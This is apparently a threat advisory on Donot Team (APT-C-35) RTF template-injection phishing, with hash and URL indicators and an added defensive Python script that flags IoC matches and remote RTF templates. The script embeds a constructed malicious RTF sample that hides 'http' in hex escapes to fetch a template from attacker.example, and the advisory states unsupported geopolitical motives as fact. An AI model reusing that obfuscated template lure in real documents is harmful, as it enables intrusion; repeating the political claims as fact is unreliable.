Rewterz Threat Advisory – CVE-2021-27077 – Microsoft Windows privilege escalation
March 10, 2021
Rewterz Threat Advisory – Multiple F5 BIG-IP Security Vulnerabilities
March 11, 2021
Severity
High
Analysis Summary
APT-C-35, also known as the Donot Team, has been actively dropping malicious RTF samples that perform template injection. The group has a history of attacking Pakistani government officials and military personnel and has been linked to India. It previously targeted Pakistani Android users with malware named StealJob, distributed through phishing under the name “Kashmiri Voice”. The attackers hunt for confidential information and intellectual property; their targets include countries in South Asia, in particular the state sector of Pakistan.
The file name suggests that the malicious attachment is a “Brief Report on International Boarder”, that is, a report on the international border and the activities along it. Reports of this type are shared with the highest-level officials, and their content is used to develop strategic planning. These attacks are now in full flow to disintegrate Pakistan after Pakistan started performing better in terms of its economy and managed to remain on the FATF grey list, whereas India pushed Pakistan to the wire to have it inducted to the blacklist so it could take advantage of the situation and gain in the region.
Impact
Information theft and Espionage
Indicators of Compromise
Filename
- Brief Report on International Boarder l 301-2(6[.]doc
MD5
- d8f19b4b3b74cf6f4cb2482c4dc88d37
SHA-256
- d417fe805ec25443ea2a0999f398ebacb6e366f7de69442757614cad2d36dc90
SHA1
- a15d011bed98bce65db597ffd2d5fde49d46cfa2
URL
- http[:]//firm[.]tplinkupdates[.]space/
Remediation
- Block all threat indicators at your respective controls.
- Search for IOCs in your environment.
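The following triage helper is an added example and not Rewterz tooling. It covers the two remediation steps above: it hashes a file and compares the digests against the MD5, SHA-1 and SHA-256 indicators published in this advisory, and it inspects RTF documents for a `\*\template` group that points at a remote URL, which is the template-injection technique the advisory attributes to APT-C-35. The remote-template check (including the handling of `\'hh` hex escapes that are sometimes used to hide the scheme) is our own generalisation of that technique, and the sample RTF, its placeholder hostname `attacker.example` and the template file name are constructed for the demonstration; none of them are indicators from the advisory.

```python
"""Defender-side triage for the advisory's IoCs and for RTF template injection.

Added example, not Rewterz code. Hash values come from the advisory; the RTF
parsing and the sample documents are ours.
"""
import hashlib
import re
import sys

# Hashes exactly as published in the advisory (lower-case hex).
IOC_HASHES = {
    "md5": {"d8f19b4b3b74cf6f4cb2482c4dc88d37"},
    "sha1": {"a15d011bed98bce65db597ffd2d5fde49d46cfa2"},
    "sha256": {"d417fe805ec25443ea2a0999f398ebacb6e366f7de69442757614cad2d36dc90"},
}

# {\*\template <target>} is the RTF destination that names an attached template.
# Word fetches the target when the document opens, so a remote target means
# the document pulls content from the network (the injection the advisory describes).
TEMPLATE_RE = re.compile(rb"\{(?:\\\*)?\\template\b\s*([^}]*)\}", re.IGNORECASE)
HEX_ESCAPE_RE = re.compile(rb"\\'([0-9a-fA-F]{2})")      # RTF \'hh byte escape
REMOTE_RE = re.compile(rb"^(?:https?|ftp|file)://", re.IGNORECASE)


def _unescape_rtf(data: bytes) -> bytes:
    """Resolve \\'hh hex escapes and escaped braces/backslashes inside a group."""
    data = HEX_ESCAPE_RE.sub(lambda m: bytes.fromhex(m.group(1).decode()), data)
    return data.replace(b"\\{", b"{").replace(b"\\}", b"}").replace(b"\\\\", b"\\")


def rtf_remote_templates(data: bytes) -> list:
    """Return remote template targets found in an RTF byte string, or [] if none.

    Accepts both the full {\\rtf1 header and the truncated {\\rt header that
    Word still opens, since malicious samples use either.
    """
    if not data.lstrip().startswith(b"{\\rt"):
        return []
    found = []
    for m in TEMPLATE_RE.finditer(data):
        target = _unescape_rtf(m.group(1)).strip()
        if REMOTE_RE.match(target):
            found.append(target.decode("latin-1"))
    return found


def hash_file_bytes(data: bytes) -> dict:
    """Compute the three digest types the advisory publishes."""
    return {
        "md5": hashlib.md5(data).hexdigest(),
        "sha1": hashlib.sha1(data).hexdigest(),
        "sha256": hashlib.sha256(data).hexdigest(),
    }


def ioc_hash_matches(data: bytes) -> list:
    """Return the digest types whose value matches a published indicator."""
    digests = hash_file_bytes(data)
    return [alg for alg, hexd in digests.items() if hexd in IOC_HASHES[alg]]


def triage(data: bytes) -> dict:
    """Combine both checks for one file's contents."""
    return {
        "hash_hits": ioc_hash_matches(data),
        "remote_templates": rtf_remote_templates(data),
    }


# Constructed sample: the template group hides "htt" behind \'hh escapes and
# fetches a remote file. Hostname and file name are placeholders, not IoCs.
SAMPLE_INJECTED = (
    b"{\\rtf1\\ansi{\\*\\template \\'68\\'74\\'74p://attacker.example/template.dotm}"
    b"{\\fonttbl{\\f0 Arial;}}\\f0 Quarterly border report attached.\\par}"
)
# Constructed sample: a template group that points at a local path is not flagged.
SAMPLE_CLEAN = b"{\\rtf1\\ansi{\\*\\template C:\\\\Templates\\\\normal.dotm}\\par}"


if __name__ == "__main__":
    # Usage: python triage.py <file> ...  (with no arguments, runs on the samples)
    targets = sys.argv[1:]
    if not targets:
        for name, blob in (("SAMPLE_INJECTED", SAMPLE_INJECTED), ("SAMPLE_CLEAN", SAMPLE_CLEAN)):
            print(name, triage(blob))
    for path in targets:
        with open(path, "rb") as fh:
            print(path, triage(fh.read()))
```

Hash matching only catches the exact sample the advisory lists, so the template check is what gives coverage against recompiled variants of the same lure; it does not cover UNC (`\\host\share`) template targets or templates referenced from OOXML `settings.xml.rels`, which need a separate check.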